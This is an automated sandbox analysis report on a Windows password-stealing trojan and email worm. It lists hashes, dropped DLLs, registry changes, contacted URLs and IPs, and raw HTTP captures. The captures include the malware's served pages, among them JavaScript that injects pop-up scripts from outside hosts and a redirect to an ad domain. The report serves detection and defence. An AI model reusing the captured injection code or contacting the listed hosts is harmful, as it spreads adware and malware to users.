Gen.Variant.Strictor.70570_5950e32034

by malwarelabrobot on November 10th, 2017 in Malware Descriptions.

Gen:Variant.Strictor.70570 (B) (Emsisoft), Gen:Variant.Strictor.70570 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 5950e32034e0e671f95897fd69de3771
SHA1: e6a484b330e484ca0ec9a579b896263903abc9eb
SHA256: 75540259097922816c4aa0062a4b9a0579c523c2d100dfa2b302a1793f0750e6
SSDeep: 24576:5V2r0IX 1G449/LLFdfRvIOyY/S7pI2etZTZaqdiXSp0c02uFG6dAk3CM6wNd:5Vc4O/nRvWe2CTZaqdwk0c05HGi6Y
Size: 2191360 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company:
Created at: 2017-10-17 05:35:07
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-PSW. Trojan program intended for stealing users passwords.

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:1504

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\kjkjz1[1].htm (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110920171110\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\19059730[1].js (485 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ErrorPageTemplate[1] (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ssggd1[1].htm (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\down[1] (748 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\background_gradient[1] (453 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\info_48[1] (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\qqkjz11[1].htm (813 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\qqkjz13[1].htm (503 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QUCWMMCQ.txt (231 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\bullet[1] (447 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\qqkjzgg1[1].htm (1310 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\gjgg[1].htm (5105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IE1IKUZH.txt (78 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3MKX82S2.txt (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\errorPageStrings[1] (2 bytes)
C:\dc.dll (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\httpErrorPagesScripts[1] (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\qqkjz12[1].htm (1273 bytes)
C:\SkinH_EL.dll (178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\mcgg[1].htm (75 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\dnserrordiagoff_webOC[1] (6 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3MKX82S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101120171012\index.dat (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101120171012 (0 bytes)

Registry activity

The process %original file name%.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"cFormatTags" = "2"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"aFormatTagCache" = "01 00 00 00 10 00 00 00 55 00 00 00 1E 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017110920171110]
"CachePrefix" = ":2017110920171110:"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017110920171110]
"CacheOptions" = "11"
"CacheLimit" = "8192"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"cFilterTags" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"fdwSupport" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017110920171110]
"CacheRepair" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017110920171110]
"CachePath" = "%USERPROFILE%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110920171110"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017101120171012]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
147127382e001f495d1842ee7a9e7912 c:\SkinH_EL.dll
f803ad370a8649a143429f179af5f3ab c:\dc.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ???????????????
Product Name: ???????????????
Product Version: 6.5.0.0
Legal Copyright: ???????????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 6.5.0.0
File Description: ???????????????
Comments: ???????????????
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 844211 847872 4.50889 6702361099ce861dadf503f48ef9a7fd
.rdata 851968 1219210 1220608 5.18538 6a482a891ee3304d67c47690662e2ce3
.data 2072576 315114 86016 3.61322 85c80b871250d8c29f8860c4d6b589f4
.rsrc 2387968 29708 32768 3.58238 2d3e1185a07acd41fe0f7b3f10ddede1

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://ad.51pc114.cn/setup/a.html 122.228.204.12
hxxp://ad.51pc114.cn/setup/ssxczgg2269.txt 122.228.204.12
hxxp://ad.51pc114.cn/ad/ssggd1.htm 122.228.204.12
hxxp://ad.51pc114.cn/ad/qqkjz11.htm 122.228.204.12
hxxp://ad.51pc114.cn/ad/mcgg.htm 122.228.204.12
hxxp://ad.51pc114.cn/ad/qqkjz12.htm 122.228.204.12
hxxp://ad.51pc114.cn/ad/qqkjz13.htm 122.228.204.12
hxxp://ad.51pc114.cn/ad/gjgg.htm 122.228.204.12
hxxp://ad.51pc114.cn/ad/qqkjzgg1.htm 122.228.204.12
hxxp://ad.51pc114.cn/setup/kjkjz1.htm 122.228.204.12
hxxp://js.users.51.la/19059730.js 14.17.102.106
hxxp://u291014.778669.com/fclose.php?id=152695 115.236.59.77
hxxp://grp1.51.la/go.asp?svid=9&id=19059730&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1276,846&referrer=&vpage=http://123.51pc114.cn/ad/qqkjz11.htm&vvtime=1510193852775
hxxp://123.51pc114.cn/ad/gjgg.htm 122.228.204.12
hxxp://123.51pc114.cn/ad/mcgg.htm 122.228.204.12
hxxp://123.51pc114.cn/ad/ssggd1.htm 122.228.204.12
hxxp://123.51pc114.cn/ad/qqkjz13.htm 122.228.204.12
hxxp://123.51pc114.cn/setup/kjkjz1.htm 122.228.204.12
hxxp://123.51pc114.cn/ad/qqkjz11.htm 122.228.204.12
hxxp://123.51pc114.cn/ad/qqkjzgg1.htm 122.228.204.12
hxxp://123.51pc114.cn/ad/qqkjz12.htm 122.228.204.12
hxxp://web.users.51.la/go.asp?svid=9&id=19059730&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1276,846&referrer=&vpage=http://123.51pc114.cn/ad/qqkjz11.htm&vvtime=1510193852775 42.236.74.238
dns.msftncsi.com 131.107.255.255
xui.ptlogin2.qq.com
p.rhgw.net
js.tongji.linezing.com
ad.7532.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /19059730.js HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/qqkjz11.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Thu, 09 Nov 2017 02:17:32 GMT
Content-Type: application/javascript
Content-Length: 1859
Last-Modified: Fri, 03 Nov 2017 07:17:37 GMT
Connection: keep-alive
ETag: "59fc1811-743"
Accept-Ranges: bytes
document.write ('<a href="hXXps://VVV.51.la/?19059730" target="_bla
nk" title="51.La 网站流量统计|
FB;统">网站统计</a>\n');..var a
9730tf="51la";var a9730pu="";var a9730pf="51la";var a9730su=window.loc
ation;var a9730sf=document.referrer;var a9730of="";var a9730op="";var 
a9730ops=1;var a9730ot=1;var a9730d=new Date();var a9730color="";if (n
avigator.appName=="Netscape"){a9730color=screen.pixelDepth;} else {a97
30color=screen.colorDepth;}..try{a9730tf=top.document.referrer;}catch(
e){}..try{a9730pu =window.parent.location;}catch(e){}..try{a9730pf=win
dow.parent.document.referrer;}catch(e){}..try{a9730ops=document.cookie
.match(new RegExp("(^| )a9730_pages=([^;]*)(;|$)"));a9730ops=(a9730ops
==null)?1: (parseInt(unescape((a9730ops)[2])) 1);var a9730oe =new Date
();a9730oe.setTime(a9730oe.getTime() 60*60*1000);document.cookie="a973
0_pages=" a9730ops  ";path=/;expires=" a9730oe.toGMTString();a9730ot=d
ocument.cookie.match(new RegExp("(^| )a9730_times=([^;]*)(;|$)"));if(a
9730ot==null){a9730ot=1;}else{a9730ot=parseInt(unescape((a9730ot)[2]))
; a9730ot=(a9730ops==1)?(a9730ot 1):(a9730ot);}a9730oe.setTime(a9730oe
.getTime() 365*24*60*60*1000);document.cookie="a9730_times=" a9730ot "
;path=/;expires=" a9730oe.toGMTString();}catch(e){}..try{if(document.c
ookie==""){a9730ops=-1;a9730ot=-1;}}catch(e){}..a9730of=a9730sf;if(a97
30pf!=="51la"){a9730of=a9730pf;}if(a9730tf!=="51la"){a9730of=a9730tf;}
a9730op=a9730pu;try{lainframe}catch(e){a9730op=a9730su;}..a9730src
<<< skipped >>>


GET /ad/ssggd1.htm HTTP/1.1
Referer: hXXp://123.51pc114.cn/ad/ssggd1.htm
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 123.51pc114.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 109
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/ssggd1.htm
Last-Modified: Fri, 06 Jan 2017 15:11:53 GMT
Accept-Ranges: bytes
ETag: "f231d0362f68d21:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: safedog-flow-item=; expires=Thur, 9-Nov-2017 15:59:26 GMT; domain=51pc114.cn; path=/
Date: Thu, 09 Nov 2017 02:17:26 GMT
....................................,..........5.2....................
............,..........................HTTP/1.1 200 OK..Content-Length
: 109..Content-Type: text/html..Content-Location: hXXp://123.51pc114.c
n/ad/ssggd1.htm..Last-Modified: Fri, 06 Jan 2017 15:11:53 GMT..Accept-
Ranges: bytes..ETag: "f231d0362f68d21:321"..Server: Microsoft-IIS/6.0.
.X-Powered-By: ASP.NET..Set-Cookie: safedog-flow-item=; expires=Thur, 
9-Nov-2017 15:59:26 GMT; domain=51pc114.cn; path=/..Date: Thu, 09 Nov 
2017 02:17:26 GMT......................................,..........5.2.
...............................,..............................


GET /ad/qqkjz11.htm HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 813
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/qqkjz11.htm
Last-Modified: Mon, 16 Jan 2017 15:57:38 GMT
Accept-Ranges: bytes
ETag: "8613f6421170d21:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:26 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>........................<script language="javascript" ty
pe="text/javascript" src="hXXp://js.users.51.la/19059730.js"></s
cript>..<noscript><a href="hXXp://VVV.51.la/?19059730" tar
get="_blank"><img alt="我要啦免费&
#x7EDF;计" src="hXXp://img.users.51.la/19059730.asp" style="bord
er:none" /></a></noscript>..</body>..</html>
;......


GET /ad/mcgg.htm HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 75
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/mcgg.htm
Last-Modified: Thu, 28 Mar 2013 03:33:01 GMT
Accept-Ranges: bytes
ETag: "8222f3642bce1:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:26 GMT
<meta HTTP-EQUIV=REFRESH CONTENT="0;URL=hXXp://ad.7532.com/ad/mcgg4
56.htm">....


GET /ad/qqkjzgg1.htm HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 3106
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/qqkjzgg1.htm
Last-Modified: Sun, 03 Sep 2017 09:19:28 GMT
Accept-Ranges: bytes
ETag: "ef72be9524d31:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:27 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>.. <br />..<font  size="2" color="red"><a hr
ef="hXXp://VVV.7532.com/2016-9-9.htm"  target="_blank">............
QQ......IP...... ....QQ1361997999:</a></font><font  siz
e="2" color="red">..<br /> ..<font  size="2" color="red"&g
t;<a href="hXXp://url.cn/OGLodN"  target="_blank">..............
..28..................:</a></font><font  size="2" color
="red">....<br />..<font  size="2" color="blue"><a h
ref="hXXp://km.7532.com"  target="_blank">............1-3........1.
.......10..4..................1-10......................7532......<
/a></font><font  size="2" color="blue"><br />..&l
t;br />..<a href="hXXp://VVV.7532.com/" target="_blank" ..style=
"color:#0000ff"><strong>..<br />.......................
...................5.2................................,...............
...........</strong></a>..<br />..<a href="http:/
/VVV.7532.com/" target="_blank" ..style="color:#ff0000"><str
<<< skipped >>>


GET /ad/qqkjz13.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 503
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/qqkjz13.htm
Last-Modified: Thu, 17 Dec 2015 13:49:22 GMT
Accept-Ranges: bytes
ETag: "6ca0e3bbd138d11:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:27 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>............................</body>..</html>..H
TTP/1.1 200 OK..Content-Length: 503..Content-Type: text/html..Content-
Location: hXXp://123.51pc114.cn/ad/qqkjz13.htm..Last-Modified: Thu, 17
 Dec 2015 13:49:22 GMT..Accept-Ranges: bytes..ETag: "6ca0e3bbd138d11:3
21"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 09 N
ov 2017 02:17:27 GMT..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 
Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional
.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head
>..<meta http-equiv="Content-Type" content="text/html; charset=g
b2312" />..<title>QQ..............</title>..<style t
ype="text/css">..<!--...STYLE1 {color: #0000FF}...STYLE2 {font-s
ize: 12px}...STYLE6 {color: #FFFFFF}..-->..</style>..</hea
d>..<html>..<body>............................</body
>..</html>....
<<< skipped >>>


GET /ad/gjgg.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 15198
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/gjgg.htm
Last-Modified: Tue, 21 Jun 2016 02:14:19 GMT
Accept-Ranges: bytes
ETag: "8228749e62cbd11:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:27 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<meta
 name="keywords" content="QQ...."/>..<meta name="description" co
ntent="QQ...."/>..<title>............</title>..<styl
e type="text/css">..<!--...STYLE1 {color: #0000FF}...STYLE2 {fon
t-size: 12px}...STYLE6 {color: #FFFFFF}..-->..</style>..</
head>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional
//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..&
lt;html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<me
ta http-equiv="Content-Type" content="text/html; charset=gb2312" />
..<title>QQ..............</title>..<style type="text/cs
s">..<!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}..
.STYLE6 {color: #FFFFFF}..-->..</style>..</head>..<h
tml>..<body>..<body>......<table width="250" border=
"0">..<tr>..<tr>..<tr>..<tr>..    <td cl
ass="STYLE2"> <span class="STYLE1"><a href="hXXp://VVV.753
2.com/" target="_blank" style="color:#FE0000;" onMouseOver="this.style
.color='#FE0000';" onMouseOut="this.style.color='#FE0000';">......Q
Q......................</a></span></td>..    <td&
gt;<span class="STYLE2">[<span class="STYLE1">........
<<< skipped >>>


GET /ad/qqkjz12.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 1273
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/qqkjz12.htm
Last-Modified: Fri, 09 Dec 2016 13:25:25 GMT
Accept-Ranges: bytes
ETag: "8efaa5b31f52d21:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:27 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>......<script language='javascript'>..// ............
......html............var random = {...ad_num : 3,...init : function()
{....n = (Math.floor(Math.random()*random.ad_num 1));....switch(n){...
..case 1:......document.writeln('<script src=\"http:\/\/p.rhgw.net\
/code\/popjs.asp?pid=258920\" charset=\"gb2312\"><\/script>')
;.....break;.....case 2:......document.writeln('<script type=\"text
\/javascript\" src=\"http:\/\/popup.jointreport-switch.com\/close.php?
uid=1130\"><\/script>');.....break;.....case 3:......document
.writeln('<script language=\"javascript\" src=\"http:\/\/u291014.77
8669.com\/fclose.php?id=180495\"><\/script>');.....break;....
}...}..}..random.init();..</script>....<script language="java
script" src="hXXp://u291014.778669.com/fclose.php?id=152695"></s
cript>......................</body>..</html>....
..
<<< skipped >>>

GET /setup/kjkjz1.htm HTTP/1.1


Referer: hXXp://123.51pc114.cn/setup/kjkjz1.htm
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 123.51pc114.cn
Cache-Control: no-cache
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 3
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/setup/kjkjz1.htm
Last-Modified: Tue, 17 Oct 2017 11:31:19 GMT
Accept-Ranges: bytes
ETag: "3c11b0733b47d31:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:27 GMT
6.5HTTP/1.1 200 OK..Content-Length: 3..Content-Type: text/html..Conten
t-Location: hXXp://123.51pc114.cn/setup/kjkjz1.htm..Last-Modified: Tue
, 17 Oct 2017 11:31:19 GMT..Accept-Ranges: bytes..ETag: "3c11b0733b47d
31:321"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 
09 Nov 2017 02:17:27 GMT..6.5..



GET /setup/a.html HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Host: ad.51pc114.cn


HTTP/1.1 200 OK
Content-Length: 45
